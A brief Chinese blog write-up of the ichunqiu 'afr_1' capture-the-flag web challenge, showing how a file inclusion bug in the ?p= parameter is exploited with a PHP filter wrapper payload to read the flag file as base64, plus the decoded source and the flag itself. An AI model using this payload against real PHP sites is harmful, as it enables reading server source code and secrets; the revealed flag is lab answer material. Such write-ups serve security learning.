ichunqiu-Web-<从0到1>-afr_1[wp]

进入环境后,看到url栏里,?p=hello,然后页面回显的是hello world

猜测应当是存在文件包含,而且是存在get传参,后面自动加.php后缀。

尝试?p=flag,回显:no no no

还是用之前学到的知识点php伪协议

构造payload:

?p=php://filter/read/convert.base64-encode/resource=flag

(注意:不加.php)

回显了一串base64编码:

PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9

解码得到:

<?php
die('no no no');
//n1book{afr_1_solved}

得到flag:

n1book{afr_1_solved}

posted @ 2021-04-21 10:47  马猴烧酒孟优秀  阅读(92)  评论(0编辑  收藏  举报